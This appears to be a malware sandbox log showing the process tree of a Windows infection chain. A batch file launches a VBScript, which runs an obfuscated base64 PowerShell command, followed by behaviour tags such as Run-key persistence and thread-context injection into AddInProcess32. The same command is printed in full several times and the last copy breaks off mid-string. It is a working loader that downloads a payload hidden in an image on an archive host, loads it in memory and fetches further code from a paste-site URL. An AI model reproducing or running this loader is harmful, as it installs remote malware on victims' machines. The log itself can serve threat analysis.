C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#By#GU#YwBs#Gk#bgBp#G4#Zw#g#D0#I##n#D##LwBC#Fo#eQ#y#GU#Yg#4#Fg#LwBk#C8#ZQBl#C4#ZQB0#HM#YQBw#C8#Lw#6#HM#c#B0#HQ#a##n#Ds#J#Bj#HI#eQBw#HQ#bwBj#G8#YwBj#HU#cw#g#D0#I##k#HI#ZQBj#Gw#aQBu#Gk#bgBn#C##LQBy#GU#c#Bs#GE#YwBl#C##Jw#j#Cc#L##g#Cc#d##n#Ds#J#Bk#HI#ZQBh#HI#I##9#C##JwBo#HQ#d#Bw#HM#Og#v#C8#aQBh#DY#M##w#Dc#M##1#C4#dQBz#C4#YQBy#GM#a#Bp#HY#ZQ#u#G8#cgBn#C8#Mw#y#C8#aQB0#GU#bQBz#C8#bgBl#Hc#XwBp#G0#YQBn#GU#Xw#y#D##Mg#1#D##N##w#DM#LwBu#GU#dwBf#Gk#bQBh#Gc#ZQ#u#Go#c#Bn#Cc#Ow#k#FM#cgBl#Hk#b#Bl#GE#aw#g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#J#Bj#G8#YwBr#GU#eQBl#GQ#I##9#C##J#BT#HI#ZQB5#Gw#ZQBh#Gs#LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#Z#By#GU#YQBy#Ck#Ow#k#HQ#ZQBs#GU#cwB5#G4#Yw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#GM#bwBj#Gs#ZQB5#GU#Z##p#Ds#J#BT#WM#bwBu#G8#bQBl#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#UwBU#EE#UgBU#D4#Pg#n#Ds#J#Bo#GE#dQBz#GU#bg#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#J#By#GU#c#By#G8#dgBp#G4#Zw#g#D0#I##k#HQ#ZQBs#GU#cwB5#G4#Yw#u#Ek#bgBk#GU#e#BP#GY#K##k#FMBYwBv#G4#bwBt#GU#KQ#7#CQ#dQBy#HQ#ZQB4#HQ#cw#g#D0#I##k#HQ#ZQBs#GU#cwB5#G4#Yw#u#Ek#bgBk#GU#e#BP#GY#K##k#Gg#YQB1#HM#ZQBu#Ck#Ow#k#HI#ZQBw#HI#bwB2#Gk#bgBn#C##LQBn#GU#I##w#C##LQBh#G4#Z##g#CQ#dQBy#HQ#ZQB4#HQ#cw#g#C0#ZwB0#C##J#By#GU#c#By#G8#dgBp#G4#Zw#7#CQ#cgBl#H##cgBv#HY#aQBu#Gc#I##r#D0#I##k#FMBYwBv#G4#bwBt#GU#LgBM#GU#bgBn#HQ#a##7#CQ#YgBp#HM#a#Bv#H##I##9#C##J#B1#HI#d#Bl#Hg#d#Bz#C##LQ#g#CQ#cgBl#H##cgBv#HY#aQBu#Gc#Ow#k#GM#YQBs#Gw#YQB0#C##PQ#g#CQ#d#Bl#Gw#ZQBz#Hk#bgBj#C4#UwB1#GI#cwB0#HI#aQBu#Gc#K##k#HI#ZQBw#HI#bwB2#Gk#bgBn#Cw#I##k#GI#aQBz#Gg#bwBw#Ck#Ow#k#GM#bwB1#G4#d#Bl#HI#bQBl#GE#cwB1#HI#ZQ#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bj#GE#b#Bs#GE#d##p#Ds#J#Bl#GM#YwBo#G8#bgBk#HI#bwBz#Gk#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#UgBl#GY#b#Bl#GM#d#Bp#G8#bg#u#EE#cwBz#GU#bQBi#Gw#eQBd#Do#OgBM#G8#YQBk#Cg#J#Bj#G8#dQBu#HQ#ZQBy#G0#ZQBh#HM#dQBy#GU#KQ#7#CQ#bgBv#G4#aQBu#HY#bwBs#HY#ZQBk#C##PQ#g#Fs#Z#Bu#Gw#aQBi#C4#SQBP#C4#S#Bv#G0#ZQBd#C4#RwBl#HQ#TQBl#HQ#a#Bv#GQ#K##n#FY#QQBJ#Cc#KQ#u#Ek#bgB2#G8#awBl#Cg#J#Bu#HU#b#Bs#Cw#I#Bb#G8#YgBq#GU#YwB0#Fs#XQBd#C##Q##o#CQ#YwBy#Hk#c#B0#G8#YwBv#GM#YwB1#HM#L##n#DE#Jw#s#Cc#Qw#6#Fw#VQBz#GU#cgBz#Fw#U#B1#GI#b#Bp#GM#X#BE#G8#dwBu#Gw#bwBh#GQ#cw#n#Cw#JwBw#G8#b#B5#H##bwBy#G8#dQBz#Cc#L##n#EE#Z#Bk#Ek#bgBQ#HI#bwBj#GU#cwBz#DM#Mg#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#JwBi#GE#d##n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#y#Cc#L##n#Cc#KQ#p##=='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"3⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2748 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵PID:6044
-
-
-
-
C:\Windows\system32\timeout.exetimeout /t 1 /nobreak2⤵
- Delays execution with timeout.exe
PID:4248
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Public\Downloads\polyporous.bat1⤵PID:4636
-
C:\Windows\system32\wscript.exewscript //nologo "C:\Windows\Temp\taluqdars.vbs"2⤵
- Checks computer location settings
PID:2676 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#By#GU#YwBs#Gk#bgBp#G4#Zw#g#D0#I##n#D##LwBC#Fo#eQ#y#GU#Yg#4#Fg#LwBk#C8#ZQBl#C4#ZQB0#HM#YQBw#C8#Lw#6#HM#c#B0#HQ#a##n#Ds#J#Bj#HI#eQBw#HQ#bwBj#G8#YwBj#HU#cw#g#D0#I##k#HI#ZQBj#Gw#aQBu#Gk#bgBn#C##LQBy#GU#c#Bs#GE#YwBl#C##Jw#j#Cc#L##g#Cc#d##n#Ds#J#Bk#HI#ZQBh#HI#I##9#C##JwBo#HQ#d#Bw#HM#Og#v#C8#aQBh#DY#M##w#Dc#M##1#C4#dQBz#C4#YQBy#GM#a#Bp#HY#ZQ#u#G8#cgBn#C8#Mw#y#C8#aQB0#GU#bQBz#C8#bgBl#Hc#XwBp#G0#YQBn#GU#Xw#y#D##Mg#1#D##N##w#DM#LwBu#GU#dwBf#Gk#bQBh#Gc#ZQ#u#Go#c#Bn#Cc#Ow#k#FM#cgBl#Hk#b#Bl#GE#aw#g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#J#Bj#G8#YwBr#GU#eQBl#GQ#I##9#C##J#BT#HI#ZQB5#Gw#ZQBh#Gs#LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#Z#By#GU#YQBy#Ck#Ow#k#HQ#ZQBs#GU#cwB5#G4#Yw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#GM#bwBj#Gs#ZQB5#GU#Z##p#Ds#J#BT#WM#bwBu#G8#bQBl#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#UwBU#EE#UgBU#D4#Pg#n#Ds#J#Bo#GE#dQBz#GU#bg#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#J#By#GU#c#By#G8#dgBp#G4#Zw#g#D0#I##k#HQ#ZQBs#GU#cwB5#G4#Yw#u#Ek#bgBk#GU#e#BP#GY#K##k#FMBYwBv#G4#bwBt#GU#KQ#7#CQ#dQBy#HQ#ZQB4#HQ#cw#g#D0#I##k#HQ#ZQBs#GU#cwB5#G4#Yw#u#Ek#bgBk#GU#e#BP#GY#K##k#Gg#YQB1#HM#ZQBu#Ck#Ow#k#HI#ZQBw#HI#bwB2#Gk#bgBn#C##LQBn#GU#I##w#C##LQBh#G4#Z##g#CQ#dQBy#HQ#ZQB4#HQ#cw#g#C0#ZwB0#C##J#By#GU#c#By#G8#dgBp#G4#Zw#7#CQ#cgBl#H##cgBv#HY#aQBu#Gc#I##r#D0#I##k#FMBYwBv#G4#bwBt#GU#LgBM#GU#bgBn#HQ#a##7#CQ#YgBp#HM#a#Bv#H##I##9#C##J#B1#HI#d#Bl#Hg#d#Bz#C##LQ#g#CQ#cgBl#H##cgBv#HY#aQBu#Gc#Ow#k#GM#YQBs#Gw#YQB0#C##PQ#g#CQ#d#Bl#Gw#ZQBz#Hk#bgBj#C4#UwB1#GI#cwB0#HI#aQBu#Gc#K##k#HI#ZQBw#HI#bwB2#Gk#bgBn#Cw#I##k#GI#aQBz#Gg#bwBw#Ck#Ow#k#GM#bwB1#G4#d#Bl#HI#bQBl#GE#cwB1#HI#ZQ#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bj#GE#b#Bs#GE#d##p#Ds#J#Bl#GM#YwBo#G8#bgBk#HI#bwBz#Gk#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#UgBl#GY#b#Bl#GM#d#Bp#G8#bg#u#EE#cwBz#GU#bQBi#Gw#eQBd#Do#OgBM#G8#YQBk#Cg#J#Bj#G8#dQBu#HQ#ZQBy#G0#ZQBh#HM#dQBy#GU#KQ#7#CQ#bgBv#G4#aQBu#HY#bwBs#HY#ZQBk#C##PQ#g#Fs#Z#Bu#Gw#aQBi#C4#SQBP#C4#S#Bv#G0#ZQBd#C4#RwBl#HQ#TQBl#HQ#a#Bv#GQ#K##n#FY#QQBJ#Cc#KQ#u#Ek#bgB2#G8#awBl#Cg#J#Bu#HU#b#Bs#Cw#I#Bb#G8#YgBq#GU#YwB0#Fs#XQBd#C##Q##o#CQ#YwBy#Hk#c#B0#G8#YwBv#GM#YwB1#HM#L##n#DE#Jw#s#Cc#Qw#6#Fw#VQBz#GU#cgBz#Fw#U#B1#GI#b#Bp#GM#X#BE#G8#dwBu#Gw#bwBh#GQ#cw#n#Cw#JwBw#G8#b#B5#H##bwBy#G8#dQBz#Cc#L##n#EE#Z#Bk#Ek#bgBQ#HI#bwBj#GU#cwBz#DM#Mg#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#JwBi#GE#d##n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#y#Cc#L##n#Cc#KQ#p##=='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"3⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2584 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵PID:5040
-
-
-
-
C:\Windows\system32\timeout.exetimeout /t 1 /nobreak2⤵
- Delays execution with timeout.exe
PID:4944
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Public\Downloads\polyporous.bat1⤵PID:2144
-
C:\Windows\system32\wscript.exewscript //nologo "C:\Windows\Temp\taluqdars.vbs"2⤵
- Checks computer location settings
PID:4308 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#By#GU#YwBs#Gk#bgBp#G4#Zw#g#D0#I##n#D##LwBC#Fo#eQ#y#GU#Yg#4#Fg#LwBk#C8#ZQBl#C4#ZQB0#HM#YQBw#C8#Lw#6#HM#c#B0#HQ#a##n#Ds#J#Bj#HI#eQBw#HQ#bwBj#G8#YwBj#HU#cw#g#D0#I##k#HI#ZQBj#Gw#aQBu#Gk#bgBn#C##LQBy#GU#c#Bs#GE#YwBl#C##Jw#j#Cc#L##g#Cc#d##n#Ds#J#Bk#HI#ZQBh#HI#I##9#C##JwBo#HQ#d#Bw#HM#Og#v#C8#aQBh#DY#M##w#Dc#M##1#C4#dQBz#C4#YQBy#GM#a#Bp#HY#ZQ#u#G8#cgBn#C8#Mw#y#C8#aQB0#GU#bQBz#C8#bgBl#Hc#XwBp#G0#YQBn#GU#Xw#y#D##Mg#1#D##N##w#DM#LwBu#GU#dwBf#Gk#bQBh#Gc#ZQ#u#Go#c#Bn#Cc#Ow#k#FM#cgBl#Hk#b#Bl#GE#aw#g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#J#Bj#G8#YwBr#GU#eQBl#GQ#I##9#C##J#BT#HI#ZQB5#Gw#ZQBh#Gs#LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#Z#By#GU#YQBy#Ck#Ow#k#HQ#ZQBs#GU#cwB5#G4#Yw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#GM#bwBj#Gs#ZQB5#GU#Z##p#Ds#J#BT#WM#bwBu#G8#bQBl#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#UwBU#EE#UgBU#D4#Pg#n#Ds#J#Bo#GE#dQBz#GU#bg#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#J#By#GU#c#By#G8#dgBp#G4#Zw#g#D0#I##k#HQ#ZQBs#GU#cwB5#G4#Yw#u#Ek#bgBk#GU#e#BP#GY#K##k#FMBYwBv#G4#bwBt#GU#KQ#7#CQ#dQBy#HQ#ZQB4#HQ#cw#g#D0#I##k#HQ#ZQBs#GU#cwB5#G4#Yw#u#Ek#bgBk#GU#e#BP#GY#K##k#Gg#YQB1#HM#ZQBu#Ck#Ow#k#HI#ZQBw#HI#bwB2#Gk#bgBn#C##LQBn#GU#I##w#C##LQBh#G4#Z##g#CQ#dQBy#HQ#ZQB4#HQ#cw#g#C0#ZwB0#C##J#By#GU#c#By#G8#dgBp#G4#Zw#7#CQ#cgBl#H##cgBv#HY#aQBu#Gc#I##r#D0#I##k#FMBYwBv#G4#bwBt#GU#LgBM#GU#bgBn#HQ#a##7#CQ#YgBp#HM#a#Bv#H##I##9#C##J#B1#HI#d#Bl#Hg#d#Bz#C##LQ#g#CQ#cgBl#H##cgBv#HY#aQBu#Gc#Ow#k#GM#YQBs#Gw#YQB0#C##PQ#g#CQ#d#Bl#Gw#ZQBz#Hk#bgBj#C4#UwB1#GI#cwB0#HI#aQBu#Gc#K##k#HI#ZQBw#HI#bwB2#Gk#bgBn#Cw#I##k#GI#aQBz#Gg#bwBw#Ck#Ow#k#GM#bwB1#G4#d#Bl#HI#bQBl#GE#cwB1#HI#ZQ#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bj#GE#b#Bs#GE#d##p#Ds#J#Bl#GM#YwBo#G8#bgBk#HI#bwBz#Gk#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#UgBl#GY#b#Bl#GM#d#Bp#G8#bg#u#EE#cwBz#GU#bQBi#Gw#eQBd#Do#OgBM#G8#YQBk#Cg#J#Bj#G8#dQBu#HQ#ZQBy#G0#ZQBh#HM#dQBy#GU#KQ#7#CQ#bgBv#G4#aQBu#HY#bwBs#HY#ZQBk#C##PQ#g#Fs#Z#Bu#Gw#aQBi#C4#SQBP#C4#S#Bv#G0#ZQBd#C4#RwBl#HQ#TQBl#HQ#a#Bv#GQ#K##n#FY#QQBJ#Cc#KQ#u#Ek#bgB2#G8#awBl#Cg#J#Bu#HU#b#Bs#Cw#I#Bb#G8#YgBq#GU#YwB0#Fs#XQBd#C##Q##o#CQ#YwBy#Hk#c#B0#G8#YwBv#GM#YwB1#HM#L##n#DE#Jw#s#Cc#Qw#6#Fw#VQBz#GU#cgBz#Fw#U#B1#GI#b#Bp#GM#X#BE#G8#dwBu#Gw#bwBh#GQ#cw#n#Cw#JwBw#G8#b#B5#H##bwBy#G8#dQBz#Cc#L##n#EE#Z#Bk#Ek#bgBQ#HI#bwBj#GU#cwBz#DM#Mg#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#JwBi#GE#d##n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#y#Cc#L##n#Cc#KQ#p##=='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"3⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:208 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵PID:876
-
-
-
-
C:\Windows\system32\timeout.exetimeout /t 1 /nobreak2⤵
- Delays execution with timeout.exe
PID:3680
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Public\Downloads\polyporous.bat1⤵PID:1912
-
C:\Windows\system32\wscript.exewscript //nologo "C:\Windows\Temp\taluqdars.vbs"2⤵
- Checks computer location settings
PID:1920 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#By#GU#YwBs#Gk#bgBp#G4#Zw#g#D0#I##n#D##LwBC#Fo#eQ#y#GU#Yg#4#Fg#LwBk#C8#ZQBl#C4#ZQB0#HM#YQBw#C8#Lw#6#HM#c#B0#HQ#a##n#Ds#J#Bj#HI#eQBw#HQ#bwBj#G8#YwBj#HU#cw#g#D0#I##k#HI#ZQBj#Gw#aQBu#Gk#bgBn#C##LQBy#GU#c#Bs#GE#YwBl#C##Jw#j#Cc#L##g#Cc#d##n#Ds#J#Bk#HI#ZQBh#HI#I##9#C##JwBo#HQ#d#Bw#HM#Og#v#C8#aQBh#DY#M##w#Dc#M##1#C4#dQBz#C4#YQBy#GM#a#Bp#HY#ZQ#u#G8#cgBn#C8#Mw#y#C8#aQB0#GU#bQBz#C8#bgBl#Hc#XwBp#G0#YQBn#GU#Xw#y#D##Mg#1#D##N##w#DM#LwBu#GU#dwBf#Gk#bQBh#Gc#ZQ#u#Go#c#Bn#Cc#Ow#k#FM#cgBl#Hk#b#Bl#GE#aw#g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#J#Bj#G8#YwBr#GU#eQBl#GQ#I##9#C##J#BT#HI#ZQB5#Gw#ZQBh#Gs#LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#Z#By#GU#YQBy#Ck#Ow#k#HQ#ZQBs#GU#cwB5#G4#Yw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#GM#bwBj#Gs#ZQB5#GU#Z##p#Ds#J#BT#WM#bwBu#G8#bQBl#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#UwBU#EE#UgBU#D4#Pg#n#Ds#J#Bo#GE#dQBz#GU#bg#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#J#By#GU#c#By#G8#dgBp#G4#Zw#g#D0#I##k#HQ#ZQBs#GU#cwB5#G4#Yw#u#Ek#bgBk#GU#e#BP#GY#K##k#FMBYwBv#G4#bwBt#GU#KQ#7#CQ#dQBy#HQ#ZQB4#HQ#cw#g#D0#I##k#HQ#ZQBs#GU#cwB5#G4#Yw#u#Ek#bgBk#GU#e#BP#GY#K##k#Gg#YQB1#HM#ZQBu#Ck#Ow#k#HI#ZQBw#HI#bwB2#Gk#bgBn#C##LQBn#GU#I##w#C##LQBh#G4#Z##g#CQ#dQBy#HQ#ZQB4#HQ#cw#g#C0#ZwB0#C##J#By#GU#c#By#G8#dgBp#G4#Zw#7#CQ#cgBl#H##cgBv#HY#aQBu#Gc#I##r#D0#I##k#FMBYwBv#G4#bwBt#GU#LgBM#GU#bgBn#HQ#a##7#CQ#YgBp#HM#a#Bv#H##I##9#C##J#B1#HI#d#Bl#Hg#d#Bz#C##LQ#g#CQ#cgBl#H##cgBv#HY#aQBu#Gc#Ow#k#GM#YQBs#Gw#YQB0#C##PQ#g#CQ#d#Bl#Gw#ZQBz#Hk#bgBj#C4#UwB1#GI#cwB0#HI#aQBu#Gc#K##k#HI#ZQBw#HI#bwB2#Gk#bgBn#Cw#I##k#GI#aQBz#Gg#bwBw#Ck#Ow#k#GM#bwB1#G4#d#Bl#HI#bQBl#GE#cwB1#HI#ZQ#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bj#GE#b#Bs#GE#d##p#Ds#J#Bl#GM#YwBo#G8#bgBk#HI#bwBz#Gk#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#UgBl#GY#b#Bl#GM#d#Bp#G8#bg#u#EE#cwBz#GU#bQBi#Gw#eQBd#Do#OgBM#G8#YQBk#Cg#J#Bj#G8#dQBu#HQ#ZQBy#G0#ZQBh#HM#dQBy#GU#KQ#7#CQ#bgBv#G4#aQBu#HY#bwBs#HY#ZQBk#C##PQ#g#Fs#Z#Bu#Gw#aQBi#C4#SQBP#C4#S#Bv#G0#ZQBd#C4#RwBl#HQ#TQBl#HQ#a#Bv#GQ#K##n#FY#QQBJ#Cc#KQ#u#Ek#bgB2#G8#awBl#Cg#J#Bu#HU#b#Bs#Cw#I#Bb#G8#YgBq#GU#YwB0#Fs#XQBd#C##Q##o#CQ#YwBy#Hk#c#B0#G8#YwBv#GM#YwB1#HM#L##n#DE#Jw#s#Cc#Qw#6#Fw#VQBz#GU#cgBz#Fw#U#B1#GI#b#Bp#GM#X#BE#G8#dwBu#Gw#bwBh#GQ#cw#n#Cw#JwBw#G8#b#B5#H##bwBy#G8#dQBz#Cc#L##n#EE#Z#Bk#Ek#bgBQ#HI#bwBj#GU#cwBz#DM#Mg#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#JwBi#GE#d##n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#y#Cc#L##n#Cc#KQ#p##=='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"3⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5484 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵PID:1988
-
-
-
-
C:\Windows\system32\timeout.exetimeout /t 1 /nobreak2⤵
- Delays execution with timeout.exe
PID:1300
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Public\Downloads\polyporous.bat1⤵PID:5616
-
C:\Windows\system32\wscript.exewscript //nologo "C:\Windows\Temp\taluqdars.vbs"2⤵
- Checks computer location settings
PID:4576 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#By#GU#YwBs#Gk#bgBp#G4#Zw#g#D0#I##n#D##LwBC#Fo#eQ#y#GU#Yg#4#Fg#LwBk#C8#ZQBl#C4#ZQB0#HM#YQBw#C8#Lw#6#HM#c#B0#HQ#a##n#Ds#J#Bj#HI#eQBw#HQ#bwBj#G8#YwBj#HU#cw#g#D0#I##k#HI#ZQBj#Gw#aQBu#Gk#bgBn#C##LQBy#GU#c#Bs#GE#YwBl#C##Jw#j#Cc#L##g#Cc#d##n#Ds#J#Bk#HI#ZQBh#HI#I##9#C##JwBo#HQ#d#Bw#HM#Og#v#C8#aQBh#DY#M##w#Dc#M##1#C4#dQBz#C4#YQBy#GM#a#Bp#HY#ZQ#u#G8#cgBn#C8#Mw#y#C8#aQB0#GU#bQBz#C8#bgBl#Hc#XwBp#G0#YQBn#GU#Xw#y#D##Mg#1#D##N##w#DM#LwBu#GU#dwBf#Gk#bQBh#Gc#ZQ#u#Go#c#Bn#Cc#Ow#k#FM#cgBl#Hk#b#Bl#GE#aw#g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#J#Bj#G8#YwBr#GU#eQBl#GQ#I##9#C##J#BT#HI#ZQB5#Gw#ZQBh#Gs#LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#Z#By#GU#YQBy#Ck#Ow#k#HQ#ZQBs#GU#cwB5#G4#Yw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#GM#bwBj#Gs#ZQB5#GU#Z##p#Ds#J#BT#WM#bwBu#G8#bQBl#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#UwBU#EE#UgBU#D4#Pg#n#Ds#J#Bo#GE#dQBz#GU#bg#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#J#By#GU#c#By#G8#dgBp#G4#Zw#g#D0#I##k#HQ#ZQBs#GU#cwB5#G4#Yw#u#Ek#bgBk#GU#e#BP#GY#K##k#FMBYwBv#G4#bwBt#GU#KQ#7#CQ#dQBy#HQ#ZQB4#HQ#cw#g#D0#I##k#HQ#ZQBs#GU#cwB5#G4#Yw#u#Ek#bgBk#GU#e#BP#GY#K##k#Gg#YQB1#HM#ZQBu#Ck#Ow#k#HI#ZQBw#HI#bwB2#Gk#bgBn#C##LQBn#GU#I##w#C##LQBh#G4#Z##g#CQ#dQBy#HQ#ZQB4#HQ#cw#g#C0#ZwB0#C##J#By#GU#c#By#G8#dgBp#G4#Zw#7#CQ#cgBl#H##cgBv#HY#aQBu#Gc#I##r#D0#I##k#FMBYwBv#G4#bwBt#GU#LgBM#GU#bgBn#HQ#a##7#CQ#YgBp#HM#a#Bv#H##I##9#C##J#B1#HI#d#Bl#Hg#d#Bz#C##LQ#g#CQ#cgBl#H##cgBv#HY#aQBu#Gc#Ow#k#GM#YQBs#Gw#YQB0#C##PQ#g#CQ#d#Bl#Gw#ZQBz#Hk#bgBj#C4#UwB1#GI#cwB0#HI#aQBu#Gc#K##k#HI#ZQBw#HI#bwB2#Gk#bgBn#Cw#I##k#GI#aQBz#Gg#bwBw#Ck#Ow#k#GM#bwB1#G4#d#Bl#HI#bQBl#GE#cwB1#HI#ZQ#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bj#GE#b#Bs#GE#d##p#Ds#J#Bl#GM#YwBo#G8#bgBk#HI#bwBz#Gk#cw#